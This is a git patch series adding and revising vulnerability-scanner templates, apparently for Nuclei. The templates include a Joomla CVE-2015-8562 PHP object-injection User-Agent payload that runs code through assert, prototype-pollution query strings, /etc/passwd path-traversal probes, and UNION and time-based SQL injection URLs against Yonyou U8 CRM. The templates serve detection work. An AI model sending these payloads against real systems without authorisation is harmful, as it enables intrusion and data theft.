From 980efaf0ccd3f6ff50ccf4d44092749300a8e199 Mon Sep 17 00:00:00 2001 From: DongyoungKim Date: Thu, 8 Aug 2024 10:49:01 +0900 Subject: [PATCH 001/218] Create CVE-2015-8562.yaml --- http/cves/2015/CVE-2015-8562.yaml | 52 +++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2015/CVE-2015-8562.yaml diff --git a/http/cves/2015/CVE-2015-8562.yaml b/http/cves/2015/CVE-2015-8562.yaml new file mode 100644 index 0000000000..792ad1ba64 --- /dev/null +++ b/http/cves/2015/CVE-2015-8562.yaml @@ -0,0 +1,52 @@ +id: CVE-2015-8562 + +info: + name: Jooma HTTP Header Unauthenticated RCE => CVE-2015-8562 + author: Kim Dongyoung (Kairos-hk), bolkv, n0ming, RoughBoy0723 + severity: Critical + description: | + Jooma CMS's HTTP Header Unauthenticated RCE + impact: | + 4 bytes when saving the header provided by the user to the db session table Send utf-8 characters to cut off the input, run the next session and read it from the db, then the desired payload This is an RCE vulnerability that allows execution of . + remediation: | + The vulnerability applies from 1.5.0 to 3.4.5. Affects a range of versions. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-8562 + - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2015-8562 + classification: + cvss-metrics: (AV:N/AC:L/Au:N/C:P/I:P/A:P) + cvss-score: 7.5 + cve-id: CVE-2015-8562 + metadata: + framework: Jooma + tags: cve,cve2015, rce, php, joomla + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Connection: close + Accept: "*/*" + extractors: + - type: regex + name: cookies + part: header + regex: + - "Set-Cookie: ([^;]+;)" + + - method: GET + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + User-Agent: "123}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:37:\"phpinfo();JFactory::getConfig();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}𝌆" + Cookie: "{{cookies}}" + Connection: close + Accept: "*/*" + matchers: + - type: word + part: body + words: + - "PHP Version" From 059bff3401f8de7515c457455c14537893175bfe Mon Sep 17 00:00:00 2001 From: DongyoungKim Date: Thu, 8 Aug 2024 10:50:29 +0900 Subject: [PATCH 002/218] Update CVE-2015-8562.yaml --- http/cves/2015/CVE-2015-8562.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2015/CVE-2015-8562.yaml b/http/cves/2015/CVE-2015-8562.yaml index 792ad1ba64..2abd2f7426 100644 --- a/http/cves/2015/CVE-2015-8562.yaml +++ b/http/cves/2015/CVE-2015-8562.yaml @@ -3,7 +3,7 @@ id: CVE-2015-8562 info: name: Jooma HTTP Header Unauthenticated RCE => CVE-2015-8562 author: Kim Dongyoung (Kairos-hk), bolkv, n0ming, RoughBoy0723 - severity: Critical + severity: High description: | Jooma CMS's HTTP Header Unauthenticated RCE impact: | From 3d448d0f80e7411fd0f709690f0b0f90adfb06a7 Mon Sep 17 00:00:00 2001 From: h41th Date: Thu, 22 Aug 2024 22:33:45 +0200 Subject: [PATCH 003/218] Update prototype pollution checks to include matchers for insecure sanitization Added some steps to check for prototype pollution when there's insecure sanitization. Pulled from Portswigger Web Academy : https://portswigger.net/web-security/prototype-pollution/client-side#bypassing-flawed-key-sanitization --- headless/prototype-pollution-check.yaml | 83 ++++++++++++++++++++++++- 1 file changed, 82 insertions(+), 1 deletion(-) diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml index 5489a5ce48..f5c7199944 100644 --- a/headless/prototype-pollution-check.yaml +++ b/headless/prototype-pollution-check.yaml @@ -88,4 +88,85 @@ headless: part: extract4 words: - "polluted" -# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + - steps: + - args: + url: "{{BaseURL}}?__pro__proto__to__[vulnerableprop]=polluted" + action: navigate + + - action: waitload + + - action: script + name: extract5 + args: + code: | + () => { + return window.vulnerableprop + } + matchers: + - type: word + part: extract5 + words: + - "polluted" + + - steps: + - args: + url: "{{BaseURL}}?__pro__proto__to__.vulnerableprop=polluted" + action: navigate + + - action: waitload + + - action: script + name: extract6 + args: + code: | + () => { + return window.vulnerableprop + } + matchers: + - type: word + part: extract6 + words: + - "polluted" + + - steps: + - args: + url: "{{BaseURL}}?constconstructorructor[protoprototypetype][vulnerableprop]=polluted" + action: navigate + + - action: waitload + + - action: script + name: extract7 + args: + code: | + () => { + return window.vulnerableprop + } + matchers: + - type: word + part: extract7 + words: + - "polluted" + + - steps: + - args: + url: "{{BaseURL}}?constconstructorructor.protoprototypetype.vulnerableprop=polluted" + action: navigate + + - action: waitload + + - action: script + name: extract8 + args: + code: | + () => { + return window.vulnerableprop + } + matchers: + - type: word + part: extract8 + words: + - "polluted" + +# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950 From dfc0e7f2f4609dc88488c29843c301954ae1c3bb Mon Sep 17 00:00:00 2001 From: Soltanali <87374678+soltanali0@users.noreply.github.com> Date: Wed, 4 Sep 2024 00:19:19 +0400 Subject: [PATCH 004/218] Create root-path-disclosure.yaml detecting 000~ROOT~000 path disclosure, targeting sensitive file paths such as /etc/passwd Contact Us If you have any questions or need further assistance, please get in touch with us via email at mhmd66242@gmail.com. --- .../exposures/files/root-path-disclosure.yaml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 blob/main/http/exposures/files/root-path-disclosure.yaml diff --git a/blob/main/http/exposures/files/root-path-disclosure.yaml b/blob/main/http/exposures/files/root-path-disclosure.yaml new file mode 100644 index 0000000000..06d8e39dbf --- /dev/null +++ b/blob/main/http/exposures/files/root-path-disclosure.yaml @@ -0,0 +1,20 @@ +id: root-path-disclosure + +info: + name: 000~ROOT~000 Path Disclosure + author: soltanali0 and ArganexEmad + severity: high + description: Detects and provides access to sensitive file paths like as /000~ROOT~000/, potentially allowing the discovery of critical system files like /etc/passwd. + tags: http + +requests: + - method: GET + path: + - "{{BaseURL}}/home/000~ROOT~000/" + - "{{BaseURL}}/000~ROOT~000/" + matchers: + - type: word + words: + - "Index of" + part: body + From eadab4b6a429024df2cf35f38827715dbe7311a9 Mon Sep 17 00:00:00 2001 From: Soltanali <87374678+soltanali0@users.noreply.github.com> Date: Wed, 4 Sep 2024 01:52:27 +0400 Subject: [PATCH 005/218] Update root-path-disclosure.yaml --- .../http/exposures/files/root-path-disclosure.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/blob/main/http/exposures/files/root-path-disclosure.yaml b/blob/main/http/exposures/files/root-path-disclosure.yaml index 06d8e39dbf..1deee59d06 100644 --- a/blob/main/http/exposures/files/root-path-disclosure.yaml +++ b/blob/main/http/exposures/files/root-path-disclosure.yaml @@ -1,12 +1,15 @@ +--- id: root-path-disclosure - info: name: 000~ROOT~000 Path Disclosure author: soltanali0 and ArganexEmad severity: high - description: Detects and provides access to sensitive file paths like as /000~ROOT~000/, potentially allowing the discovery of critical system files like /etc/passwd. - tags: http - + description: > + Detects potential exposure of sensitive file paths like /000~ROOT~000/, + which may allow unauthorized access to critical system files like + /etc/passwd. + tags: + - Path Disclosure requests: - method: GET path: @@ -17,4 +20,3 @@ requests: words: - "Index of" part: body - From 6afdaf3dca1b70f0de95f5cfc878bd1616513edd Mon Sep 17 00:00:00 2001 From: Soltanali <87374678+soltanali0@users.noreply.github.com> Date: Wed, 4 Sep 2024 15:05:49 +0400 Subject: [PATCH 006/218] Update root-path-disclosure.yaml --- .../http/exposures/files/root-path-disclosure.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/blob/main/http/exposures/files/root-path-disclosure.yaml b/blob/main/http/exposures/files/root-path-disclosure.yaml index 1deee59d06..2132a18786 100644 --- a/blob/main/http/exposures/files/root-path-disclosure.yaml +++ b/blob/main/http/exposures/files/root-path-disclosure.yaml @@ -14,9 +14,23 @@ requests: - method: GET path: - "{{BaseURL}}/home/000~ROOT~000/" + - "{{BaseURL}}/home/000~ROOT~000/etc/passwd" + - "{{BaseURL}}/home/000~ROOT~000/etc/passwd-" - "{{BaseURL}}/000~ROOT~000/" + - "{{BaseURL}}/000~ROOT~000/etc/passwd" + - "{{BaseURL}}/OLDS/home/000~ROOT~000/" + - "{{BaseURL}}/OLDS/home/000~ROOT~000/etc/passwd" + - "{{BaseURL}}/app/webroot/files/kcfinder/files/home/000~ROOT~000/" + - "{{BaseURL}}/app/webroot/files/kcfinder/files/home/000~ROOT~000/etc/passwd" matchers: - type: word words: - "Index of" + - "Last modified" + - "Last Description" + - "root:x" part: body + - type: status + status: + - 200 + - 403 From dfa2aee645db022da76e7750a7a85fbf87e14cd7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 4 Sep 2024 20:04:46 +0530 Subject: [PATCH 007/218] fix-template --- .../exposures/files/root-path-disclosure.yaml | 36 ------------------- .../root-path-disclosure.yaml | 32 +++++++++++++++++ 2 files changed, 32 insertions(+), 36 deletions(-) delete mode 100644 blob/main/http/exposures/files/root-path-disclosure.yaml create mode 100644 http/misconfiguration/root-path-disclosure.yaml diff --git a/blob/main/http/exposures/files/root-path-disclosure.yaml b/blob/main/http/exposures/files/root-path-disclosure.yaml deleted file mode 100644 index 2132a18786..0000000000 --- a/blob/main/http/exposures/files/root-path-disclosure.yaml +++ /dev/null @@ -1,36 +0,0 @@ ---- -id: root-path-disclosure -info: - name: 000~ROOT~000 Path Disclosure - author: soltanali0 and ArganexEmad - severity: high - description: > - Detects potential exposure of sensitive file paths like /000~ROOT~000/, - which may allow unauthorized access to critical system files like - /etc/passwd. - tags: - - Path Disclosure -requests: - - method: GET - path: - - "{{BaseURL}}/home/000~ROOT~000/" - - "{{BaseURL}}/home/000~ROOT~000/etc/passwd" - - "{{BaseURL}}/home/000~ROOT~000/etc/passwd-" - - "{{BaseURL}}/000~ROOT~000/" - - "{{BaseURL}}/000~ROOT~000/etc/passwd" - - "{{BaseURL}}/OLDS/home/000~ROOT~000/" - - "{{BaseURL}}/OLDS/home/000~ROOT~000/etc/passwd" - - "{{BaseURL}}/app/webroot/files/kcfinder/files/home/000~ROOT~000/" - - "{{BaseURL}}/app/webroot/files/kcfinder/files/home/000~ROOT~000/etc/passwd" - matchers: - - type: word - words: - - "Index of" - - "Last modified" - - "Last Description" - - "root:x" - part: body - - type: status - status: - - 200 - - 403 diff --git a/http/misconfiguration/root-path-disclosure.yaml b/http/misconfiguration/root-path-disclosure.yaml new file mode 100644 index 0000000000..071eb4506f --- /dev/null +++ b/http/misconfiguration/root-path-disclosure.yaml @@ -0,0 +1,32 @@ +id: root-path-disclosure + +info: + name: ROOT - Path Disclosure + author: soltanali0,ArganexEmad + severity: high + description: | + Detects potential exposure of sensitive file paths like /000~ROOT~000/. + metadata: + verified: true + max-request: 4 + tags: misconfig,exposure,info-leak,listing + +http: + - method: GET + path: + - "{{BaseURL}}/home/000~ROOT~000/etc/passwd" + - "{{BaseURL}}/000~ROOT~000/etc/passwd" + - "{{BaseURL}}/OLDS/home/000~ROOT~000/etc/passwd" + - "{{BaseURL}}/app/webroot/files/kcfinder/files/home/000~ROOT~000/etc/passwd" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From d9405804cf8381afaddc2169a6d1f1752dc29cc1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 6 Sep 2024 20:26:21 +0530 Subject: [PATCH 008/218] Create CVE-2024-40711.yaml --- http/cves/2024/CVE-2024-40711.yaml | 38 ++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/cves/2024/CVE-2024-40711.yaml diff --git a/http/cves/2024/CVE-2024-40711.yaml b/http/cves/2024/CVE-2024-40711.yaml new file mode 100644 index 0000000000..462a0dad0c --- /dev/null +++ b/http/cves/2024/CVE-2024-40711.yaml @@ -0,0 +1,38 @@ +id: CVE-2024-40711 + +info: + name: Veeam Backup & Replication - Unauthenticated + author: rootxharsh,iamnoooob,DhiyaneshDK + severity: critical + description: | + A remote code execution in Veeam Backup & Replication can be exploited without authentication. + reference: + - https://x.com/codewhitesec/status/1831720125747069389?s=46 + metadata: + shodan-query: + verified: true + max-request: 1 + tags: cve,cve2024,veeam,backup,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/serverinfo" + headers: + X-Api-Version: 1.1-rev1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "databaseVendor" + + - type: word + part: content_type + words: + - "application/json" + + - type: status + status: + - 200 From c91a5cdb816796db6edd270be83282226d945caf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 6 Sep 2024 20:29:31 +0530 Subject: [PATCH 009/218] shodan-query update --- http/cves/2024/CVE-2024-40711.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-40711.yaml b/http/cves/2024/CVE-2024-40711.yaml index 462a0dad0c..9b8568ff5a 100644 --- a/http/cves/2024/CVE-2024-40711.yaml +++ b/http/cves/2024/CVE-2024-40711.yaml @@ -9,7 +9,7 @@ info: reference: - https://x.com/codewhitesec/status/1831720125747069389?s=46 metadata: - shodan-query: + shodan-query: html:"Veeam Backup" verified: true max-request: 1 tags: cve,cve2024,veeam,backup,unauth From a381f221344cc47c88cc182bd565fa527fed890c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 8 Oct 2024 14:22:54 +0530 Subject: [PATCH 010/218] minor-update --- headless/prototype-pollution-check.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml index f5c7199944..7788abb55f 100644 --- a/headless/prototype-pollution-check.yaml +++ b/headless/prototype-pollution-check.yaml @@ -5,7 +5,8 @@ info: author: pdteam severity: medium metadata: - max-request: 4 + max-request: 8 + verified: true tags: headless headless: @@ -17,7 +18,7 @@ headless: - action: waitload - action: script - name: extract + name: extract1 args: code: | () => { @@ -25,7 +26,7 @@ headless: } matchers: - type: word - part: extract + part: extract1 words: - "polluted" @@ -163,6 +164,7 @@ headless: () => { return window.vulnerableprop } + matchers: - type: word part: extract8 From e84458360a80af3455ff02cb9bbb9a194d9f1ddb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 8 Oct 2024 14:29:52 +0530 Subject: [PATCH 011/218] Update and rename CVE-2024-40711.yaml to CVE-2024-40711.yaml --- {http => passive}/cves/2024/CVE-2024-40711.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {http => passive}/cves/2024/CVE-2024-40711.yaml (100%) diff --git a/http/cves/2024/CVE-2024-40711.yaml b/passive/cves/2024/CVE-2024-40711.yaml similarity index 100% rename from http/cves/2024/CVE-2024-40711.yaml rename to passive/cves/2024/CVE-2024-40711.yaml From 80f325a3678e845d3971306dee3866937d090f34 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 8 Oct 2024 14:34:13 +0530 Subject: [PATCH 012/218] added metadata --- passive/cves/2024/CVE-2024-40711.yaml | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/passive/cves/2024/CVE-2024-40711.yaml b/passive/cves/2024/CVE-2024-40711.yaml index 9b8568ff5a..ec69303f05 100644 --- a/passive/cves/2024/CVE-2024-40711.yaml +++ b/passive/cves/2024/CVE-2024-40711.yaml @@ -8,11 +8,19 @@ info: A remote code execution in Veeam Backup & Replication can be exploited without authentication. reference: - https://x.com/codewhitesec/status/1831720125747069389?s=46 + - https://www.veeam.com/kb4649 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-40711 + cwe-id: CWE-502 + epss-score: 0.00043 + epss-percentile: 0.09666 metadata: - shodan-query: html:"Veeam Backup" verified: true max-request: 1 - tags: cve,cve2024,veeam,backup,unauth + shodan-query: html:"Veeam Backup" + tags: cve,cve2024,veeam,backup,unauth,passive http: - method: GET @@ -27,6 +35,8 @@ http: part: body words: - "databaseVendor" + - "databaseContentVersion" + condition: and - type: word part: content_type From f18f7e29f263fe8eb194105e7d26ad33597e9307 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 8 Oct 2024 14:53:11 +0530 Subject: [PATCH 013/218] fix-fp-matcher --- http/misconfiguration/root-path-disclosure.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/root-path-disclosure.yaml b/http/misconfiguration/root-path-disclosure.yaml index 071eb4506f..288fb10ca7 100644 --- a/http/misconfiguration/root-path-disclosure.yaml +++ b/http/misconfiguration/root-path-disclosure.yaml @@ -25,7 +25,12 @@ http: - type: regex part: body regex: - - "root:.*:0:0:" + - "^root:.*:0:0:" + + - type: regex + part: accept_ranges + regex: + - "bytes" - type: status status: From 6a1f266fd81c6aa48ea7460aab0f0cefb1adc478 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 8 Oct 2024 15:48:39 +0530 Subject: [PATCH 014/218] added flow and updated matcher --- http/cves/2015/CVE-2015-8562.yaml | 78 ++++++++++++++++--------------- 1 file changed, 41 insertions(+), 37 deletions(-) diff --git a/http/cves/2015/CVE-2015-8562.yaml b/http/cves/2015/CVE-2015-8562.yaml index 2abd2f7426..58cc97b5e5 100644 --- a/http/cves/2015/CVE-2015-8562.yaml +++ b/http/cves/2015/CVE-2015-8562.yaml @@ -1,52 +1,56 @@ id: CVE-2015-8562 info: - name: Jooma HTTP Header Unauthenticated RCE => CVE-2015-8562 - author: Kim Dongyoung (Kairos-hk), bolkv, n0ming, RoughBoy0723 - severity: High - description: | - Jooma CMS's HTTP Header Unauthenticated RCE - impact: | - 4 bytes when saving the header provided by the user to the db session table Send utf-8 characters to cut off the input, run the next session and read it from the db, then the desired payload This is an RCE vulnerability that allows execution of . - remediation: | - The vulnerability applies from 1.5.0 to 3.4.5. Affects a range of versions. + name: Joomla HTTP Header Unauthenticated - Remote Code Execution + author: kairos-hk,bolkv,n0ming,RoughBoy0723 + severity: high reference: - - https://nvd.nist.gov/vuln/detail/CVE-2015-8562 - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2015-8562 + - https://nvd.nist.gov/vuln/detail/CVE-2015-8562 classification: - cvss-metrics: (AV:N/AC:L/Au:N/C:P/I:P/A:P) + cvss-metrics: AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2015-8562 metadata: - framework: Jooma - tags: cve,cve2015, rce, php, joomla + max-request: 2 + vendor: joomla + product: joomla\! + shodan-query: + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" + fofa-query: body="joomla! - open source content management" + tags: cve,cve2015,joomla,rce,unauth -requests: - - method: GET - path: - - "{{BaseURL}}" - headers: - Host: "{{Hostname}}" - Connection: close - Accept: "*/*" - extractors: - - type: regex - name: cookies - part: header - regex: - - "Set-Cookie: ([^;]+;)" +flow: http(1) && http(2) - - method: GET - path: - - "{{BaseURL}}" - headers: - Host: "{{Hostname}}" - User-Agent: "123}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:37:\"phpinfo();JFactory::getConfig();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}𝌆" - Cookie: "{{cookies}}" - Connection: close - Accept: "*/*" +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"Joomla")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆 + Connection: close + + matchers-condition: and matchers: - type: word - part: body words: - "PHP Version" + + - type: status + status: + - 200 From 9e2beb6337d801f815ed291898b8149744bd44e5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 8 Oct 2024 15:49:29 +0530 Subject: [PATCH 015/218] add description --- http/cves/2015/CVE-2015-8562.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2015/CVE-2015-8562.yaml b/http/cves/2015/CVE-2015-8562.yaml index 58cc97b5e5..d3fcf89625 100644 --- a/http/cves/2015/CVE-2015-8562.yaml +++ b/http/cves/2015/CVE-2015-8562.yaml @@ -3,6 +3,8 @@ id: CVE-2015-8562 info: name: Joomla HTTP Header Unauthenticated - Remote Code Execution author: kairos-hk,bolkv,n0ming,RoughBoy0723 + description: | + Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015 severity: high reference: - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2015-8562 From 6a6a36f2aa7f4728fa6bc38e3015fae428f82d15 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 8 Oct 2024 18:22:20 +0300 Subject: [PATCH 016/218] add u8 sqli --- .../yonyou/yonyou-u8-crm-sqli.yaml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml new file mode 100644 index 0000000000..15e55fbad7 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml @@ -0,0 +1,39 @@ +id: yonyou-u8-crm-sqli + +info: + name: UFIDA U8 CRM fillbacksetting.php - Sql Injection + author: s4e-io + severity: high + description: | + UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security. + reference: + - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-CRM%E7%B3%BB%E7%BB%9Ffillbacksetting.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: title="甹揋U8CRM" + tags: yonyou,u8-crm,sqli + +http: + - raw: + - | + GET /config/fillbacksettingedit.php?DontCheckLogin=1&action=edit&id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL--+ HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID=bgsesstimeout-; + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "src_obj_type\":\"businesInfo\",\"src_fld" + + - type: regex + part: body + negative: true + regex: + - "src_fld\":null" + + - type: status + status: + - 200 From 9bcd81db2eca9d27368fb7a0e1ea78cc2c27ce12 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 8 Oct 2024 18:23:45 +0300 Subject: [PATCH 017/218] add u8 tb sqli --- .../yonyou/yonyou-u8-crm-tb-sqli.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml new file mode 100644 index 0000000000..5cd274d165 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml @@ -0,0 +1,31 @@ +id: yonyou-u8-crm-tb-sqli + +info: + name: UFIDA U8 CRM fillbacksetting.php - Time Based Sql Injection + author: s4e-io + severity: high + description: | + UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security. + reference: + - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-CRM%E7%B3%BB%E7%BB%9Ffillbacksetting.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: title="甹揋U8CRM" + tags: yonyou,u8-crm,time-based-sqli + +http: + - raw: + - | + @timeout 20s + GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID=bgsesstimeout-; + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains(body, "success\":true")' + - 'status_code == 200' + condition: and From f49c96ec2999947fcee35342cbf93483bdba2729 Mon Sep 17 00:00:00 2001 From: Rishi Date: Tue, 8 Oct 2024 19:34:31 +0100 Subject: [PATCH 018/218] veritas panel --- .../veritas-netbackup-panel.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/exposed-panels/veritas-netbackup-panel.yaml diff --git a/http/exposed-panels/veritas-netbackup-panel.yaml b/http/exposed-panels/veritas-netbackup-panel.yaml new file mode 100644 index 0000000000..2d95b3072a --- /dev/null +++ b/http/exposed-panels/veritas-netbackup-panel.yaml @@ -0,0 +1,32 @@ +id: veritas-netbackup-opscenter-panel + +info: + name: Veritas NetBackup OpsCenter Analytics Detection - Panel + author: rxerium + severity: info + description: A Veritas NetBackup OpsCenter Analytics page was detected. + reference: + - https://www.veritas.com/ + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: http.html:"Veritas NetBackup OpsCenter Analytics" + tags: panel,veritas,netbackup,opscenter,analytics + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/opscenter" + + matchers-condition: and + matchers: + - type: word + words: + - 'Veritas NetBackup OpsCenter Analytics' + part: body + + - type: status + status: + - 200 \ No newline at end of file From 76fe7d511c463735def9f42c2f9d4d9d29c6cf14 Mon Sep 17 00:00:00 2001 From: Rishi Date: Tue, 8 Oct 2024 19:38:48 +0100 Subject: [PATCH 019/218] oracle-fusion-detect --- .../oracle-fusion-middleware-detect.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/technologies/oracle-fusion-middleware-detect.yaml diff --git a/http/technologies/oracle-fusion-middleware-detect.yaml b/http/technologies/oracle-fusion-middleware-detect.yaml new file mode 100644 index 0000000000..58ec50b8dd --- /dev/null +++ b/http/technologies/oracle-fusion-middleware-detect.yaml @@ -0,0 +1,27 @@ +id: oracle-fusion-middleware-detect + +info: + name: Oracle Fusion Middleware Detection + author: rxerium + severity: info + description: Oracle Fusion Middleware was detected. + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"Welcome to Oracle Fusion Middleware" + tags: oracle,middleware,detect,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Welcome to Oracle Fusion Middleware" + part: body \ No newline at end of file From 1813dc9b6aed25159b50372b58f27cc98dcd199c Mon Sep 17 00:00:00 2001 From: Rishi Date: Tue, 8 Oct 2024 19:51:51 +0100 Subject: [PATCH 020/218] add matchers condition --- http/technologies/oracle-fusion-middleware-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/technologies/oracle-fusion-middleware-detect.yaml b/http/technologies/oracle-fusion-middleware-detect.yaml index 58ec50b8dd..795775c230 100644 --- a/http/technologies/oracle-fusion-middleware-detect.yaml +++ b/http/technologies/oracle-fusion-middleware-detect.yaml @@ -15,7 +15,8 @@ requests: - method: GET path: - "{{BaseURL}}" - + + matchers-condition: and matchers: - type: status status: From 85c5f223a364e8651bfc1e9399bd610b973bb954 Mon Sep 17 00:00:00 2001 From: Rishi Date: Tue, 8 Oct 2024 20:09:58 +0100 Subject: [PATCH 021/218] accellion --- http/technologies/accellion-detect.yaml | 31 +++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/technologies/accellion-detect.yaml diff --git a/http/technologies/accellion-detect.yaml b/http/technologies/accellion-detect.yaml new file 